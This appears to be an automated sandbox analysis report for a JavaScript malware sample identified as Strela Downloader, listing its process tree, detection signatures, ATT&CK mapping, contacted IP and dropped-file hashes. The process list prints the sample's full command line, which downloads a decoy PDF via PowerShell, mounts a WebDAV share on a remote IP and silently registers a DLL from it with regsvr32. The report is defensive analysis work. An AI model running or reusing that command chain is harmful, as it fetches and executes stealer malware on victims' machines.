Windows
Analysis Report
10256249222235922013.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 6152 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\10256 2492222359 22013.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 5748 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\178 9012284321 3.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5744 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3752 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 6720 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 5168 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 3348 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 28 --field -trial-han dle=1728,i ,171844521 2906505839 6,10896006 7784253516 59,131072 --disable- features=B ackForward Cache,Calc ulateNativ eWinOcclus ion,WinUse BrowserSpe llChecker /prefetch: 8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 3128 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
7% | Virustotal | Browse | ||
8% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588789 |
Start date and time: | 2025-01-11 05:32:19 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 51s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 15 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 10256249222235922013.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/60@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 52.6.155.20, 3.219.243.226, 52.22.41.97, 3.233.129.217, 162.159.61.3, 172.64.41.3, 184.28.90.27, 23.209.209.135, 2.16.168.107, 2.16.168.105, 23.200.0.33, 192.168.2.5, 13.107.246.45, 20.12.23.50, 23.41.168.139
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
23:33:15 | API Interceptor | |
23:33:19 | API Interceptor | |
23:33:19 | API Interceptor | |
23:33:31 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.8307248321848163 |
Encrypted: | false |
SSDEEP: | 1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugT:gJjJGtpTq2yv1AuNZRY3diu8iBVqFx |
MD5: | 28D166E73CFF04C36C25F9129D7B4679 |
SHA1: | F9131B84D9761966180FED791077ECDA720BED71 |
SHA-256: | 5548E199C2008A0A2219CAC140EB39CEB8617FC1A5445D7B90554BA259532683 |
SHA-512: | 0B36EF3B9DD4F297DCBC7BD6B1BE38BA20223BA8D8CA40ABDEF10CC5B5AD92FC877FE3F2B3D928E19A0D31FC59F8AEE288AE8554A183E595EDD7E61154187A50 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.6585925114062011 |
Encrypted: | false |
SSDEEP: | 1536:pSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:paza9v5hYe92UOHDnAPZ4PZf9h/9h |
MD5: | 97475963EA6F66E93F4A705BCC2B15F6 |
SHA1: | 991BA87FAB9C0BCE09149948CEA7EF198BB8185D |
SHA-256: | 6F65735949945E820CDC01687CEB0650D217C9E8C12B223A5FBDAA5BADA02CA0 |
SHA-512: | DD83270A042AA3894CA242F69504CFA193D3AAE21DEC1A0E358C07CEA55E3952F1C905CFB9A272E5A75C13A5552C20031BC8F6542F48DAA02D920D7C785E0048 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08108248316855929 |
Encrypted: | false |
SSDEEP: | 3:GFmEYeBTRIPhVGuAJkhvekl1KvFrft/allrekGltll/SPj:GF9zBTRkrxl09rVGJe3l |
MD5: | A79421CDEA2D9A4EC69FC6340671FB5A |
SHA1: | B13F2FBFFCEFC9C016996F5E8A5C0B1D00B50DF8 |
SHA-256: | 661EAD0202250F0F97DF4BE36C1D7CC5253B3ED2243EC586FBF7387A6DD271F5 |
SHA-512: | 4115C4236A19E97355A2272DE4C6D383BA0463E011783266593E81D666B36C6C30C53C68C8C8001EB3CC60A5053347882382AD7091F7E1C5E1F17839864D8FFD |
